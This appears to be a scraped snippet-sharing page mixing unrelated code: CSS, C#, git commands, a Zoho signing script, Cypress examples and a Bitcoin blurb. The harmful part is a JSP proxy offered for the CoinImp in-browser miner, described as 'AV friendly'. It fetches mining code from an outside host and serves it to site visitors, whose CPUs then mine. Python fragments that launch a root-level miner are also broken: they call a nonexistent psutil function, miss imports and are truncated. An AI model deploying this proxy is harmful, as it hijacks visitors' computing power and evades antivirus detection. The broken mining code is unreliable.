<style type="text/css">#closed:target {display:none;}div#closed {background-color:#1e1b1bcf;width:100vw;height:100vh;z-index:10000;display:block;position:absolute;top:0;left:0;}#caution {margin:10vh auto;background:#D9A900;width:50vw;height:auto;position:relative;padding:4em;}#caution p {font-size:1.5em;line-height:1.4em;}a.fermer {position:absolute;top:0;right:0;display:block;padding:2em;}#caution a:hover {background:white !important;color:black !important;}@media screen and (max-width: 500px) {#caution {width:80vw;padding:1em;}a.fermer {padding:0.5em;}#caution h1 {margin-top:1em;}}</style>
<!-- Dismissible voting-notice overlay: the "fermer" link targets #closed,
     and the #closed:target rule hides the whole layer.
     Fixed: two occurrences of the invalid value "display:bloc" (a typo the
     browser silently ignored) are now "display:block". -->
<div id="closed">
<div id="caution"><a style="background:black;color:white;font-weight:bold;" class="fermer" href="#closed">fermer</a>
<h1 style="color:white;">Les 14 et 15 mai, je vote !</h1>
<p style="font-weight:bold;">Élection du représentant des personnels BIATSS de la ComUE UdL au CA</p>
<a style="display:block;background:black;color:white;font-size:1.5em;text-transform:uppercase;padding:1em;width:300px;text-align:center;margin:0 auto;" href="[id-fiche]actualite;1714383313921;0[/id-fiche]#KLINK" _linktype="interne">Comment voter ?</a></div>
</div>
/* Hide testimonials rated below 2 stars: matches items whose *second* star
   icon is the empty-outline glyph ("fa fa-star-o"). Requires :has()
   support in the browser. */
.sp-testimonial-pro-item:has( .tpro-client-rating .fa:nth-of-type(2)[class="fa fa-star-o"] ) {
    display: none;
}
// Minimum AccountLevel across all rows of the DataTable (DataTable.Compute
// returns object, hence the Convert.ToInt32).
// NOTE(review): "minLavel" is presumably a typo for "minLevel" — rename if
// nothing else references it.
int minLavel = Convert.ToInt32(dt.Compute("min([AccountLevel])", string.Empty));
git pull --rebase — use this instead of a normal pull

git rebase --abort — if something goes wrong with the command above

git merge --abort  

git config --list
<%@page autoFlush="false" session="false"%><%@page import = "java.net.*,java.io.*,java.util.*" %><%
/*
This is a generic caching proxy built for use with Java hosted sites (Caucho, Resin, Tomcat, etc.). This was
originally built for use with CoinImp.com JavaScript miner. However, the AV friendly code supplied by CoinImp
is PHP only.  You may place this .jsp file on your server instead of using the CoinImp PHP file. Here is an
example of how to call the JSP proxy code from your JavaScript client. Note, substitute the correct Client ID
which you can obtain from the CoinImp portal. Also, set the throttle as you need it.

<script src="/coinproxy.jsp?f=1Ri3.js"></script>
<script>
    var _client = new Client.Anonymous('YOUR KEY GOES HERE', {
        throttle: 0.7
    });
    _client.start();
</script>

No guarantees or warranties are made. Use at your own risk. This code is released to the public domain.
*/

try {
        response.setHeader("Access-Control-Allow-Origin", "*");
        response.setCharacterEncoding("UTF-8");

        // SECURITY fix: `f` comes straight from the request and is used to
        // build a path under /tmp. Reject null/empty values and anything
        // containing path separators or "..", which previously allowed
        // path traversal (e.g. f=../../etc/passwd) and an NPE when the
        // parameter was missing.
        String filename = request.getParameter("f");
        if (filename == null || filename.isEmpty()
                || filename.contains("..") || filename.contains("/") || filename.contains("\\")) {
                response.sendError(400);
                return;
        }

        if (filename.contains(".js")) {
                response.setContentType("application/javascript; charset=utf-8");
        } else {
                response.setContentType("application/octet-stream; charset=utf-8");
        }

        String host = java.net.URLEncoder.encode(request.getRequestURL().toString(), "UTF-8").replace("+", "%20");
        String reqUrl = "http://www.wasm.stream?filename=" + java.net.URLEncoder.encode(filename, "UTF-8").replace("+", "%20") + "&host=" + host;
        File f = new File("/tmp/" + filename);

        // Refresh the cached copy when it is missing or older than one hour.
        if (!f.exists() || (new Date().getTime() - f.lastModified()) > 60 * 60 * 1000) {
                URL url = new URL(reqUrl);
                HttpURLConnection uc = (HttpURLConnection) url.openConnection();
                InputStream in = uc.getInputStream();
                FileOutputStream fo = new FileOutputStream(f);
                try {
                        byte[] buffer = new byte[4096];
                        int count;
                        while ((count = in.read(buffer)) != -1) {
                                fo.write(buffer, 0, count);
                        }
                        fo.flush();
                } finally {
                        // Always release the streams, even when the upstream
                        // fetch fails mid-copy (previously leaked on error).
                        try { fo.close(); } catch (IOException ignore) {}
                        try { in.close(); } catch (IOException ignore) {}
                }
        }

        // Stream the cached file as the response body.
        FileInputStream fi = new FileInputStream(f);
        try {
                OutputStream output = response.getOutputStream();
                response.setContentLength((int) (f.length()));

                System.out.println("File length: " + String.valueOf(f.length()));

                byte[] buffer = new byte[4096];
                int count;
                while ((count = fi.read(buffer)) != -1) {
                        output.write(buffer, 0, count);
                }
        } finally {
                fi.close();
        }

} catch (Exception e) {
e.printStackTrace();
}
%>
// Build the mail-merge request: which template to render, plus the output
// file name and format.
mail_merge_template = Map();
mail_merge_template.put("name","Copy Shareholder Agreement");
download_mail_merge = Map();
download_mail_merge.put("mail_merge_template", mail_merge_template);
download_mail_merge.put("output_format", "pdf");
download_mail_merge.put("file_name", "Test Shareholder Agreement");

param = Map();
// The v6 endpoint expects a list under "download_mail_merge".
param.put("download_mail_merge", download_mail_merge.toList());

// Render the merged document as a PDF from the Deal record.
download_pdf = invokeurl
[
	url: "https://www.zohoapis.com/crm/v6/Deals/"+DealID+"/actions/download_mail_merge"
	type: POST
	parameters: param.toString()
	connection:"zoho_crm"
];

info download_pdf;
// Name the multipart field so Zoho Sign receives the file as "file".
download_pdf.setParamName("file");

/////////// Send Using Zoho Sign ////////


// One signer, verified by email.
action_list = List();
action = Map();
action.put("action_type", "SIGN");
action.put("recipient_email", "roy@gmail.com");
action.put("recipient_name", "Roy");
action.put("verify_recipient", true);
action.put("verification_type", "EMAIL");
action_list.add(action);
// Envelope settings: name, non-sequential signing, reminders every 2 days.
// NOTE(review): "Shareholer" looks like a typo for "Shareholder" in the
// request name below.
request = Map();
request.put("request_name", "Test Shareholer Agreement");
request.put("is_sequential", false);
request.put("actions", action_list);
request.put("email_reminders", true);
request.put("reminder_period", 2);
requests = Map();
requests.put("requests", request);
data = Map();
data.put("data", requests);
info data;
/////
// Create the signature request with the rendered PDF attached.
send_doc = invokeurl
[
	url: "https://sign.zoho.com/api/v1/requests"
	type: POST
	parameters: data
	files: download_pdf
	connection: "zoho_sign"
];

info send_doc;
/* Make the element fully inert to the pointer: it receives no clicks,
   hovers, or other mouse/touch events (they pass through to whatever
   is underneath). */
.noClick {
  pointer-events: none;
}
// Cypress scrolling examples: cy.scrollTo(...) scrolls the window itself,
// while chaining .scrollTo(...) off cy.get(...) scrolls that specific
// scrollable element. (The pair is repeated verbatim below.)
cy.scrollTo(0, 500) // Scroll the window 500px down
cy.get('.sidebar').scrollTo('bottom') // Scroll 'sidebar' to its bottom
cy.scrollTo(0, 500) // Scroll the window 500px down
cy.get('.sidebar').scrollTo('bottom') // Scroll 'sidebar' to its bottom
Examine the environmental implications of Bitcoin Layer 2 scaling solutions in mitigating the carbon footprint associated with traditional proof-of-work (PoW) consensus mechanisms. Discover how Lightning Network and other Layer 2 protocols reduce on-chain congestion and energy consumption by facilitating a greater volume of transactions off-chain. Explore the potential for Layer 2 scaling to enhance the sustainability and long-term viability of the Bitcoin network, aligning with global efforts towards eco-friendly blockchain technologies.

bash
Edit
Run
Full Screen
Copy code
python monitor_resources.py
python
Edit
Run
Full Screen
Copy code
1import os
2import psutil
3import smtplib
4from email.message import EmailMessage
5
6def send_email_alert(subject, body):
7    msg = EmailMessage()
8    msg.set_content(body)
9    msg["Subject"] = subject
10    msg["From"] = "your_email_address"
11    msg["To"] = "your_email_address"
12
13    with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
14        server.login("your_email_address", "your_email_password")
15        server.send_message(msg)
16
17def monitor_resources():
18    while True:
19        cpu_usage = psutil.cpu_percent()
20        gpu_usage = psutil.gpu_percent()
21        memory_usage = psutil.virtual_memory().percent
22
23        if cpu_usage > 80 or gpu_usage > 80 or memory_usage > 80:
24            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
25
26        time.sleep(10)
27
28if __name__ == "__main__":
29    check_permissions()
30    monitor_resources()
python
Edit
Run
Full Screen
Copy code
1def monitor_resources():
2    """Monitor system resources and take action if necessary"""
3    while True:
4        # Check CPU and GPU usage
5        cpu_usage = psutil.cpu_percent()
6        gpu_usage = psutil.gpu_percent()
7
8        # If CPU or GPU usage exceeds the threshold, stop mining and send an alert
9        if cpu_usage > 80 or gpu_usage > 80:
10            logger.warning("CPU or GPU usage too high! Stopping mining...")
11            os.system("killall miner")
12            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
13            notify_user("CPU or GPU usage too high! Stopping mining...")
14
15        # Sleep for 10 seconds before checking again
16        time.sleep(10)
python
Edit
Run
Full Screen
Copy code
1import argparse
2import hashlib
3import logging
4import os
5import platform
6import psutil
7import scapy
8import plyer
9import time
10import threading
11import smtplib
12from email.message import EmailMessage
13
14# Set up logging
15logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
16logger = logging.getLogger(__name__)
17
18def get_system_info():
19    """Get system information"""
20    username = getpass.getuser()
21    hostname = platform.node()
22    system_info = f"{username}@{hostname}"
23    return system_info
24
25def generate_unique_id(system_info):
26    """Generate a unique ID based on system information"""
27    unique_id = hashlib.sha256(system_info.encode()).hexdigest()
28    return unique_id
29
30def start_miner(wallet_address, mining_pool, unique_id):
31    """Start the miner with the given wallet address, mining pool, and unique ID"""
32    miner_command = f"miner --algo=ethash --pool={mining_pool} --user={wallet_address} --rig-id={unique_id}"
33    logger.info(f"Starting miner with command: {miner_command}")
34    os.system(miner_command)
35
36def check_permissions():
37    """Check if the script has sufficient permissions to run"""
38    if os.geteuid() != 0:
39        logger.error("Insufficient permissions to run the script. Please run as root.")
40        exit(1)
41
42def monitor_resources():
43    """Monitor system resources and take action if necessary"""
44    while True:
45        # Check CPU and GPU usage
46        cpu_usage = psutil.cpu_percent()
47        gpu_usage = psutil.gpu_percent()
48
49        # If CPU or GPU usage exceeds the threshold, stop mining and send an alert
50        if cpu_usage > 80 or gpu_usage > 80:
51            logger.warning("CPU or GPU usage too high! Stopping mining...")
52            os.system("killall miner")
53            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
54            notify_user("CPU or GPU usage too high! Stopping mining...")
55
56        # Sleep for 10 seconds before checking again
57        time.sleep(10)
58
59def monitor_network():
60    """Monitor network traffic and take action if necessary"""
61    while True:
62        # Check for unusual outbound connections
63        packets = scapy.sniff(filter="outbound")
64        for packet in packets:
65            if packet.haslayer(scapy.IP) and packet.haslayer(scapy.TCP):
66                if packet[scapy.TCP].dport == 444
python
Edit
Run
Full Screen
Copy code
1# Start the network monitoring thread
2if args.network_monitoring:
3    network_monitoring_thread = threading.Thread(target=monitor_network)
4    network_monitoring_thread.start()
5
6# Start the user notification thread
7user_notification_thread = threading.Thread(target=notify_user, args=("Miner started!",))
8user_notification_thread.start()
9
10# Keep the main thread alive until the user terminates the script
11while True:
12    time.sleep(1)
star

Wed May 15 2024 09:08:03 GMT+0000 (Coordinated Universal Time) https://blocksentinels.com/blockchain-game-development-company

@harsha98 #blockchain #gamedevelopment

star

Wed May 15 2024 08:50:05 GMT+0000 (Coordinated Universal Time)

@madgakantara

star

Wed May 15 2024 05:35:47 GMT+0000 (Coordinated Universal Time)

@hardikraja #commandline #linux

star

Wed May 15 2024 05:33:48 GMT+0000 (Coordinated Universal Time)

@hardikraja #commandline #linux

star

Wed May 15 2024 04:13:15 GMT+0000 (Coordinated Universal Time)

@iliavial #c#

star

Wed May 15 2024 03:36:16 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/53845493/cypress-uncaught-assertion-error-despite-cy-onuncaughtexception

@al.thedigital #exception #false

star

Wed May 15 2024 00:14:25 GMT+0000 (Coordinated Universal Time) https://testing.profitbusters.com/

@batman12050

star

Tue May 14 2024 22:39:20 GMT+0000 (Coordinated Universal Time) https://css-tricks.com/snippets/wordpress/year-shortcode/

@systemsroncal #php #wordpress

star

Tue May 14 2024 19:17:01 GMT+0000 (Coordinated Universal Time)

@Akhil_preetham #javascript

star

Tue May 14 2024 17:36:13 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/38031719/making-an-array-flat-understanding-the-solution

@RobertoSilvaZ #javascript #array

star

Tue May 14 2024 15:56:57 GMT+0000 (Coordinated Universal Time)

@Justus

star

Tue May 14 2024 15:00:29 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:49:27 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:46:47 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:38:46 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 13:34:43 GMT+0000 (Coordinated Universal Time)

@odesign

star

Tue May 14 2024 13:22:53 GMT+0000 (Coordinated Universal Time) https://pwpush.com/en/p/ulty-fwrovdinjqycyy

@tianzonrupert

star

Tue May 14 2024 12:17:47 GMT+0000 (Coordinated Universal Time)

@Justus

star

Tue May 14 2024 11:38:24 GMT+0000 (Coordinated Universal Time) https://medium.com/@priscillashamin/how-to-install-and-configure-nvm-on-mac-os-43e3366c75a6

@temp

star

Tue May 14 2024 11:29:32 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 11:27:01 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 11:17:24 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 08:46:32 GMT+0000 (Coordinated Universal Time) https://kepty.cz/2024/02/18/replace-noseriesmanagement-with-the-new-bc-foundation-no-series-app-1-2/

@obaidullahjadun #al

star

Tue May 14 2024 08:21:21 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/73729492/cypress-multi-reporters-using-mochawesome-with-autoset-status-cypress-testrail

@al.thedigital #cypress #config #plugins #add

star

Tue May 14 2024 08:21:21 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 08:20:37 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 08:10:19 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 06:17:56 GMT+0000 (Coordinated Universal Time)

@webmasterUdL

star

Tue May 14 2024 04:29:55 GMT+0000 (Coordinated Universal Time)

@Pulak

star

Tue May 14 2024 03:43:49 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/2442525/how-to-select-min-and-max-values-of-a-column-in-a-datatable

@javicinhio #cs

star

Tue May 14 2024 03:20:56 GMT+0000 (Coordinated Universal Time)

@StephenThevar

star

Tue May 14 2024 01:05:12 GMT+0000 (Coordinated Universal Time)

@RobertoSilvaZ #expo #sdk #npm

star

Mon May 13 2024 20:53:45 GMT+0000 (Coordinated Universal Time) https://checker.top/

@Amator021

star

Mon May 13 2024 17:09:18 GMT+0000 (Coordinated Universal Time) https://pastebin.com/qj3S08eA

@Traumlaeufer #coinimp #java

star

Mon May 13 2024 16:25:40 GMT+0000 (Coordinated Universal Time) https://www.electronmove.com/%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%81%E0%B8%81%E0%B8%A3%E0%B8%A1%E0%B8%84%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%93%E0%B9%82%E0%B8%8B%E0%B8%A5%E0%B9%88%E0%B8%B2%E0%B8%AD%E0%B8%AD%E0%B8%99%E0%B9%84%E0%B8%A5%E0%B8%99%E0%B9%8C/63b78844ffdbd000133c89e4

@avxthn01 #javascript #css #html

star

Mon May 13 2024 14:55:28 GMT+0000 (Coordinated Universal Time)

@RehmatAli2024 #deluge

star

Mon May 13 2024 11:52:40 GMT+0000 (Coordinated Universal Time)

@ythhj #css

star

Mon May 13 2024 11:32:10 GMT+0000 (Coordinated Universal Time) https://valoc.fun/

@whois

star

Mon May 13 2024 09:05:58 GMT+0000 (Coordinated Universal Time) undefined

@curtisbarry

star

Mon May 13 2024 08:36:05 GMT+0000 (Coordinated Universal Time) https://docs.cypress.io/api/commands/scrollTo

@al.thedigital #scroll

star

Mon May 13 2024 08:35:18 GMT+0000 (Coordinated Universal Time) https://docs.cypress.io/api/commands/scrollTo

@al.thedigital

star

Mon May 13 2024 07:35:03 GMT+0000 (Coordinated Universal Time) https://www.blockchainappfactory.com/bitcoin-layer-2-solutions

@zarazyana #bitcoinlayer2 #bitcoinlayer2solutions #bitcoinlayer2blockhainsolutions #bitcoinlayer2development

star

Mon May 13 2024 05:08:23 GMT+0000 (Coordinated Universal Time) https://mail.google.com/mail/u/0/?tab

@curtisbarry

star

Mon May 13 2024 03:55:05 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:55:03 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:58 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:56 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:51 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

Save snippets that work with our extensions

Available in the Chrome Web Store Get Firefox Add-on Get VS Code extension